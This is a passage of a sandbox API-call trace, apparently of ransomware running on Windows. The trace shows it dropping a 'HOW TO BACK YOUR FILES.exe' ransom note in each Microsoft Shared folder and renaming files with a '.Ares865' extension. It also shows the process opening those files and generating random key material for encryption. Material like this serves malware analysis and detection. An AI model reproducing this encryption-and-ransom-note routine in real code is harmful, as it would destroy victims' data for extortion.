lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e792cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e792cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.451] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.452] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.452] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT" [0075.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0075.452] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2440 | out: hHeap=0x2b0000) returned 1 [0075.452] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned 64 [0075.452] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT" [0075.452] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.452] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.457] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.457] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7b8e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7b8e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.457] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.457] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.458] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM" [0075.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0075.458] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2420 | out: hHeap=0x2b0000) returned 1 [0075.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned 64 [0075.458] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM" [0075.458] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.466] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.466] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7b8e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7b8e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.467] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.467] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.467] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS" [0075.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0270 | out: hHeap=0x2b0000) returned 1 [0075.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0075.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned 62 [0075.467] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS" [0075.467] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.467] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blends\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.471] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.471] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLENDS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a15810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7def80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7def80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.471] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.471] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.471] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS" [0075.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f02f8 | out: hHeap=0x2b0000) returned 1 [0075.471] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0075.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned 60 [0075.471] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS" [0075.471] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.472] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.475] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.475] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7def80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7def80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.475] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.475] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.476] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC" [0075.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.476] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0075.476] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned 62 [0075.476] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC" [0075.476] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.476] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.480] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.480] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5146e3d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e7def80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e7def80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.481] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.481] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.481] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON" [0075.481] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0075.481] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0075.481] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned 64 [0075.481] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON" [0075.481] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.481] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.486] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e8050e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e8050e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.486] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.487] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv" [0075.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0075.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0075.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned 55 [0075.487] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv" [0075.487] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.487] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5e8050e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5e8050e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0075.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0075.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0075.493] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.Ares865") returned 76 [0075.493] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.ares865"), dwFlags=0x1) returned 1 [0075.493] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.493] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=36712) returned 1 [0075.494] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0075.494] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.494] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0075.569] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0075.570] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.570] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0075.571] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.Ares865") returned 75 [0075.571] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.ares865"), dwFlags=0x1) returned 1 [0075.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.572] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=57248) returned 1 [0075.572] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0075.573] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.573] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0075.611] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0075.612] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.612] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0075.613] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.Ares865") returned 75 [0075.613] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.ares865"), dwFlags=0x1) returned 1 [0075.614] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=196976) returned 1 [0075.615] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0075.615] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.615] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0075.715] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0160) returned 1 [0075.716] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.716] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0075.719] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.Ares865") returned 75 [0075.719] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv.ares865"), dwFlags=0x1) returned 1 [0075.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0075.721] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=289648) returned 1 [0075.721] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0160) returned 1 [0075.722] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0075.722] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0075.741] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0160) returned 1 [0075.741] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0075.742] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0075.746] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US" [0075.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0075.746] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0075.746] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned 61 [0075.746] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US" [0075.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0075.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0075.769] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0075.769] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5ea666e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5ea666e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 